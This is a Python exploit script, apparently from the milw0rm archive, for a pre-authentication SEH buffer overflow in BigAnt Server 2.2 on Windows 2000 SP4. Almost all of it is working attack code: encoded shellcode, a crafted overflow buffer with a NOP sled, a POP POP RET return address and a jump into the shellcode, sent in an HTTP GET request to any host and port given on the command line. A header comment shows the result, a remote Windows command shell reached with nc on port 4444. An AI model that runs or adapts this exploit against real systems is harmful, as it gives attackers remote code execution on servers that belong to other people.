BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)

                                                #!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe 
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
#            muts you gave me the wrong pill! it's your fault!!! 
#                      I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys

print "[*********************************************************************]"
print "[*                                                                   *]"
print "[*         BigAnt Server PreAuth Remote SEH Overflow (0day)          *]"
print "[*                      Discovered and Coded By                      *]"
print "[*                          Matteo Memelli                           *]" 
print "[*                             (ryujin)                              *]" 
print "[*              www.be4mind.com - www.gray-world.net                 *]"
print "[*                                                                   *]"
print "[*********************************************************************]"
usage =  "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
(options, args) = parser.parse_args()
HOST    = options.HOST
PORT    = options.PORT
if not (HOST and PORT):
   parser.print_help()
   sys.exit()

# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)

# 77F8AEDC  POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
          '\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
          'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)

# milw0rm.com [2008-04-15]